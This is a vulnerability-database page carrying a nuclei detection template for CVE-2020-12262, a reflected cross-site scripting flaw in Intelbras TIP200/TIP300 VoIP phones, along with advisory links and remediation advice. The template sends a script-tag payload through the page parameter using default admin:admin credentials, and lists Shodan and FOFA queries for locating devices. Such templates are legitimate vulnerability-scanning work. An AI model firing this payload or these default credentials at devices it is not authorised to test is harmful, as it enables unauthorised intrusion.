Lucene search
+L

Intelbras TIP200/TIP200LITE/TIP300 - Cross-Site Scripting

🗓️ 19 Aug 2026 04:15:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Intelbras TIP200/TIP200LITE/TIP300 are vulnerable to reflected cross-site scripting attacks.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2020-12262
30 May 202517:26
circl
cnnvd
CNNVD
Cross-Site Scripting Vulnerability in Multiple Intelbras Products
26 Nov 202000:00
cnnvd
cve
CVE
CVE-2020-12262
26 Nov 202023:41
cve
cvelist
Cvelist
CVE-2020-12262
26 Nov 202023:41
cvelist
euvd
EUVD
EUVD-2020-4576
7 Oct 202500:30
euvd
nvd
NVD
CVE-2020-12262
27 Nov 202000:15
nvd
osv
OSV
CVE-2020-12262
27 Nov 202000:15
osv
prion
Prion
Cross site scripting
27 Nov 202000:15
prion
ptsecurity
Positive Technologies
PT-2020-13082 · Intelbras · Intelbras Tip 200 Lite +2
26 Nov 202000:00
ptsecurity
redhatcve
RedhatCVE
CVE-2020-12262
9 Jan 202609:56
redhatcve
id: CVE-2020-12262

info:
  name: Intelbras TIP200/TIP200LITE/TIP300 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 are vulnerable to reflected cross-site scripting (XSS) via the page parameter in /cgi-bin/cgiServer.exx, allowing attackers to execute arbitrary JavaScript in the context of the user.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the page parameter, potentially stealing session cookies or performing unauthorized actions on behalf of authenticated users.
  remediation: |
    Update the device firmware to the latest version provided by Intelbras.
  reference:
    - https://lucxs.medium.com/cve-2020-12262-xss-voip-intelbras-d5697e31fbf6
    - https://www.youtube.com/watch?v=rihboOgiJRs
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12262
  classification:
    cve-id: CVE-2020-12262
    cwe-id: CWE-79
    epss-score: 0.01819
    epss-percentile: 0.76897
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
  metadata:
    max-request: 1
    product: tip300
    vendor: intelbras
    shodan-query: title:"Intelbras"
    fofa-query: title="Intelbras"
  tags: cve,cve2020,intelbras,tip200,tip200lite,tip300,xss,authenticated,vuln

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        GET /cgi-bin/cgiServer.exx?page=<script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "File not found"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b42394bf4ec38d76226a9f8b24d6e98d3bf473ef2f07854b3edebc421b4b6330220251621816a5c98056d5e7f3f18b319ab275cca9bde59a8960f5e0c2a9b0be786:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 23.5
CVSS 3.15.4
EPSS0.01819
37